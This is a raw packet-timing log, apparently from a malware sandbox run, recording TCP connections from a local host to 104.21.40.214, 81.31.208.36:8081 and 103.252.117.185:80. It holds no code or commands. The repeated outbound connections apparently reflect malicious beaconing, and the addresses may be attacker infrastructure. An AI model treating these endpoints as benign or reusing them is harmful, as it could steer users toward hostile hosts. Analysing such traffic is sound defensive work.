Dec 19, 2024 14:48:14.030291080 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.030487061 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.030539036 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.030555010 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.036725044 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.036773920 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.036788940 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.037398100 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.037441969 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.037451982 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.045433998 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.045627117 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.045634985 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.045788050 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.052623987 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.052663088 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.052756071 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.052756071 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.052772999 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.060091972 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.060461044 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.060476065 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.060569048 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.060587883 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.061455965 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.067049026 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.067069054 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.067141056 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.073091030 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.073174953 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.073210955 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.073245049 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.073256969 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.073313951 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.080604076 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.080641031 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.080674887 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.087455988 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.087476969 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.087529898 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.094460011 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.094543934 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.094556093 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.094671011 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.094753981 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.094762087 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.094863892 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.102183104 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.102204084 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.102324009 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.108932018 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.109030008 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.109039068 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.109533072 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.116056919 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.116077900 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.116449118 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.116492987 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.116605043 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.123419046 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.123497009 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.130218983 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.130239964 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.130381107 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.130795002 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.130863905 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.137470961 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.137548923 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.145600080 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.145715952 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.151758909 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.151843071 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.158907890 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.159097910 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.165877104 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.166105032 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.173197985 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.173379898 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.180197954 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.180751085 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.180788994 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.181163073 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.187743902 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.187889099 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.190939903 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.191127062 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.197976112 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.198249102 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.229732990 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.229885101 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.240238905 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.240533113 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.242400885 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.242778063 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.247761011 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.247939110 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.250387907 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.250556946 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.250571012 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.251764059 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.257817984 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.258102894 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.260090113 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.260225058 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.264816999 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.264982939 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.267340899 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.267637014 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.273937941 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.274166107 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.276624918 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.276734114 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.281203032 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.281498909 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.282716036 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.282881975 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.290003061 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.290144920 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.291359901 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.291565895 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.292355061 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.292807102 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.293735981 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.294980049 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.297247887 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.297363997 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.301264048 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.301373005 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.301923037 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.302007914 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.302933931 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.303076029 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.306601048 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.306833029 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.307650089 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.310174942 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.310224056 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.310242891 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.310272932 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.311491013 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.311564922 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.311566114 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.314945936 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.315634966 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.315836906 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.317878008 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.318823099 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.318907976 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.319600105 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.319900036 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.320935965 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.321070910 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.324440002 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.324552059 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.325707912 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.325788021 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.326793909 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.326911926 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.328116894 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.328218937 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.331705093 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.331749916 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.331785917 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.331926107 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.333621025 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.334533930 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.337922096 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.338087082 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.339230061 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.339435101 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.340020895 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.340137005 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.340327024 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.340595007 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.341698885 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.341785908 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.342783928 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.342956066 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.345180035 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.345334053 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.346467972 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.347579956 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.357038021 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.357479095 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.359700918 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.360682011 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.364413977 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.364604950 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.369155884 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.369287968 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.424753904 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.424787045 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.424834967 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.424871922 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.424871922 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.424892902 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.424906969 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.424925089 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.425023079 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.427735090 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.427834034 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.430876970 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.431629896 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.431639910 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.433245897 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.433255911 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.433444977 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.443500996 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.443562031 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.443619013 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.443629980 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.443659067 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.447144985 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.447165966 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.447233915 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.447233915 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.447247982 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.447545052 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.455115080 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.455156088 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.455203056 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.455213070 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.455246925 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.456653118 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.456830025 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.456841946 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.456934929 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.459486008 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.459515095 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.459522963 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.459552050 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.459563017 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.459589958 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.459594011 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.459628105 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.462960958 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.463119030 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.464046955 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.464143038 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.464338064 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.464451075 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.464463949 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.464598894 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.465981960 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.466064930 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.466928959 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.467108965 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.472155094 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.472207069 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.472239017 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.472249031 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.472271919 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.473735094 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.473908901 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.473921061 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.474023104 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.475522995 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.475569963 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.475617886 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.475625992 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.475657940 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.475785971 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.480742931 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.480787039 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.480819941 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.480833054 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.480858088 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.482824087 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.482870102 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.482918978 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.482933998 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.482937098 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.482971907 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.482983112 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.482983112 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.482991934 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.486869097 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.486978054 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.486993074 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.487134933 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.489125967 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.489635944 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.490695000 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.490740061 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.490782022 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.490788937 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.490814924 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.491007090 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.491453886 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.492296934 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.492436886 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.494376898 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.494497061 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.496918917 CET	49726	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.496934891 CET	443	49726	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.497529030 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.497634888 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.497664928 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.497992039 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.503624916 CET	49725	443	192.168.2.6	104.21.40.214
Dec 19, 2024 14:48:14.503645897 CET	443	49725	104.21.40.214	192.168.2.6
Dec 19, 2024 14:48:14.620172024 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:48:14.742093086 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:48:14.742255926 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:48:15.499500036 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:48:15.619029999 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:48:16.547972918 CET	49742	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:48:16.633312941 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:48:16.667500973 CET	80	49742	103.252.117.185	192.168.2.6
Dec 19, 2024 14:48:16.667754889 CET	49742	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:48:16.679054976 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:48:17.124227047 CET	49742	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:48:17.243709087 CET	80	49742	103.252.117.185	192.168.2.6
Dec 19, 2024 14:48:19.112652063 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:48:19.176058054 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:48:38.586523056 CET	80	49742	103.252.117.185	192.168.2.6
Dec 19, 2024 14:48:38.586620092 CET	49742	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:48:38.586688995 CET	49742	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:48:41.732306957 CET	49806	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:48:41.851932049 CET	80	49806	103.252.117.185	192.168.2.6
Dec 19, 2024 14:48:41.852065086 CET	49806	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:48:42.487770081 CET	49806	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:48:42.607321978 CET	80	49806	103.252.117.185	192.168.2.6
Dec 19, 2024 14:49:03.041085958 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:49:03.160717964 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:49:03.743511915 CET	80	49806	103.252.117.185	192.168.2.6
Dec 19, 2024 14:49:03.743612051 CET	49806	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:03.743710995 CET	49806	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:04.243762016 CET	8081	49736	81.31.208.36	192.168.2.6
Dec 19, 2024 14:49:04.288625956 CET	49736	8081	192.168.2.6	81.31.208.36
Dec 19, 2024 14:49:06.875292063 CET	49869	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:06.994993925 CET	80	49869	103.252.117.185	192.168.2.6
Dec 19, 2024 14:49:06.995126963 CET	49869	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:07.415564060 CET	49869	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:07.535181046 CET	80	49869	103.252.117.185	192.168.2.6
Dec 19, 2024 14:49:28.900219917 CET	80	49869	103.252.117.185	192.168.2.6
Dec 19, 2024 14:49:28.900335073 CET	49869	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:28.900424957 CET	49869	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:32.023813009 CET	49923	80	192.168.2.6	103.252.117.185
Dec 19, 2024 14:49:32.143423080 CET	80	49923	103.252.117.185	192.168.2.6
